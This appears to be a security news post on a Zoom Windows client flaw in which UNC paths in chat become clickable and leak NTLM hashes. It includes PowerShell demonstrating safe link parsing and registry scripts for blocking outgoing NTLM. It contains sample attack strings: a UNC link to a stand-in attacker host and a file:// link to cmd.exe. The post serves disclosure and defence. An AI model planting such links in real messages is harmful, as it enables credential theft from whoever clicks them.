1) The Zoom client for Windows was recently found to be vulnerable to UNC path injection. Zoom is primarily an audio and video conferencing application, but it also lets participants exchange text messages in its chat interface. As Bleeping Computer reported, an attacker can abuse a flaw in the chat module to steal the Windows login credentials of any user who clicks a crafted link.
2) When a chat message is sent, any URLs it contains are converted into links so that other members of the group can click them and open the page in their default browser.
> However, security researcher @undercodeTesting found that the Zoom client also turns Windows network UNC paths into clickable links in chat messages.
> Both a regular URL and a UNC path such as \\evil.server.com\images\cat.jpg are rendered as clickable links in the chat message.
3) If a user clicks the UNC path link, Windows tries to connect to the remote host over the SMB file sharing protocol in order to open cat.jpg from the remote path.
By default, Windows sends the user's login name and NTLM password hash to that host as part of the authentication, and even a less experienced attacker can recover the password from the captured hash with a free tool such as Hashcat.
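The root cause is link conversion that treats anything link-shaped as clickable. The following PowerShell is an added example, not Zoom's code, that runs a few constructed chat messages through a naive converter (which linkifies UNC paths and file:// links just like http URLs) and through a hardened converter that parses each candidate with System.Uri and only allow-lists absolute http and https URLs. Function and variable names are made up for the demo.

```powershell
# Added example (not Zoom's code): naive vs. allow-listed chat link conversion.
# The chat messages below are constructed for the demo.
$SampleMessages = @(
    'photo here https://example.com/images/cat.jpg',
    'photo here \\evil.server.com\images\cat.jpg',
    'try this file://C:/Windows/System32/cmd.exe'
)

# Matches anything that looks like a link: any scheme:// or a \\host\share UNC path.
$LooseLinkPattern = '(?i)(?<link>(?:[a-z][a-z0-9+.-]*://|\\\\)\S+)'

function ConvertTo-ChatLinkNaive {
    param([string]$Message)
    # Vulnerable behaviour: every match becomes clickable, UNC paths included.
    [regex]::Replace($Message, $LooseLinkPattern,
        [System.Text.RegularExpressions.MatchEvaluator]{
            param($m)
            $t = $m.Groups['link'].Value
            "<a href=`"$t`">$t</a>"
        })
}

function ConvertTo-ChatLinkSafe {
    param([string]$Message)
    # Hardened behaviour: parse the candidate and keep only absolute http/https URLs.
    # \\evil.server.com\images\cat.jpg parses as scheme 'file' with IsUnc = $true,
    # so it stays plain text, and so does the file:// link.
    [regex]::Replace($Message, $LooseLinkPattern,
        [System.Text.RegularExpressions.MatchEvaluator]{
            param($m)
            $t   = $m.Groups['link'].Value
            $uri = $null
            $ok  = [System.Uri]::TryCreate($t, [System.UriKind]::Absolute, [ref]$uri)
            if ($ok -and -not $uri.IsUnc -and $uri.Scheme -in @('http', 'https')) {
                return "<a href=`"$t`">$t</a>"
            }
            return $t
        })
}

foreach ($msg in $SampleMessages) {
    'naive: ' + (ConvertTo-ChatLinkNaive $msg)
    'safe : ' + (ConvertTo-ChatLinkSafe  $msg)
}
```

Only the first sample message comes out of ConvertTo-ChatLinkSafe with an anchor tag; the UNC path and the file:// link are printed unchanged, which is the behaviour the post says Zoom's client needs.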
4) Security researcher Matthew Hickey (@HackerFantastic) confirmed that the injection works in Zoom and that the captured hash can be cracked quickly with current consumer GPUs and CPUs.
Beyond stealing Windows login credentials, Hickey told Bleeping Computer that the same UNC injection can also be used to launch programs on the local computer (for example the CMD command prompt) when the link is clicked.
5) Fortunately, Windows asks the user whether to allow the program to run before it is executed. To close this hole, Zoom needs to stop its Windows client from converting UNC paths into clickable hyperlinks.
Hickey reported the issue to Zoom on Twitter, but at the time of writing it is not clear what action the company has taken.
6) Until an official patch is released, security-conscious users can restrict outgoing NTLM traffic to remote servers through Group Policy:
Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options -> Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers, set to Deny all.
7) Note that if you apply this policy on a domain-joined computer, you may run into problems accessing network shares that rely on NTLM authentication.
Windows 10 Home users, who have no access to the Group Policy editor, can set the same restriction through the Registry Editor (the DWORD value 2 means Deny all):
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0] "RestrictSendingNTLMTraffic"=dword:00000002
8) To create this value, launch Registry Editor as an administrator.
If you later need to restore the default Windows behaviour of sending NTLM credentials, simply delete the RestrictSendingNTLMTraffic value.
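The registry mitigation above is usually applied from an elevated PowerShell prompt rather than by hand. The following script is an added example, not part of the original post: it reads, sets and removes the RestrictSendingNTLMTraffic value under MSV1_0, refuses to write unless the session is elevated, and adds an Audit mode (value 1) so that on a domain-joined machine you can see which outgoing NTLM authentications would be blocked before switching to Deny all. The function names are made up; the key path, value name and the meaning of values 0/1/2 (allow all, audit all, deny all) are the documented ones for this policy, and the event ID used in Get-AuditedOutboundNtlm is the one Windows logs for audited outgoing NTLM traffic.

```powershell
# Added example (not from the original post): manage the outgoing NTLM restriction
# described above with PowerShell. Run from an elevated session.
$NtlmKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
$NtlmName = 'RestrictSendingNTLMTraffic'
# Documented values for this policy: 0 = allow all, 1 = audit all, 2 = deny all.
$NtlmModes = @{ Allow = 0; Audit = 1; Deny = 2 }

function Test-IsElevated {
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    (New-Object Security.Principal.WindowsPrincipal $id).IsInRole(
        [Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Get-OutboundNtlmRestriction {
    # A missing value means Windows is using the default: NTLM is sent freely.
    $v = Get-ItemProperty -Path $NtlmKey -Name $NtlmName -ErrorAction SilentlyContinue
    if ($null -eq $v) { return 'Allow all (default, value not set)' }
    switch ($v.$NtlmName) {
        0       { 'Allow all' }
        1       { 'Audit all' }
        2       { 'Deny all' }
        default { "Unknown value $_" }
    }
}

function Set-OutboundNtlmRestriction {
    param([ValidateSet('Allow', 'Audit', 'Deny')][string]$Mode)
    if (-not (Test-IsElevated)) { throw 'Registry Editor rights needed: run PowerShell as administrator.' }
    # -Force overwrites an existing value; the MSV1_0 key exists on every Windows install.
    New-ItemProperty -Path $NtlmKey -Name $NtlmName -PropertyType DWord `
        -Value $NtlmModes[$Mode] -Force | Out-Null
    Get-OutboundNtlmRestriction
}

function Remove-OutboundNtlmRestriction {
    # Deleting the value restores the default behaviour, as the post describes.
    if (-not (Test-IsElevated)) { throw 'Run PowerShell as administrator.' }
    Remove-ItemProperty -Path $NtlmKey -Name $NtlmName -ErrorAction SilentlyContinue
    Get-OutboundNtlmRestriction
}

function Get-AuditedOutboundNtlm {
    # In Audit mode Windows logs outgoing NTLM authentication that Deny all would block
    # as event 8001 (NTLM client blocked audit) in the Microsoft-Windows-NTLM/Operational log.
    param([int]$Newest = 20)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-NTLM/Operational'; Id = 8001 } `
        -MaxEvents $Newest -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Message
}

# Typical sequence on a domain-joined machine: audit first, review, then deny.
Get-OutboundNtlmRestriction
Set-OutboundNtlmRestriction -Mode Audit
Get-AuditedOutboundNtlm
# Set-OutboundNtlmRestriction -Mode Deny      # once the audit shows nothing you need
# Remove-OutboundNtlmRestriction              # to go back to the Windows default
```

The Audit step is the practical answer to the caveat in point 7: if the audit log fills with entries for file servers or printers you depend on, Deny all will break them, and you should fix those first or accept the trade-off until Zoom ships a patch.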
WRITTEN BY UNDERCODE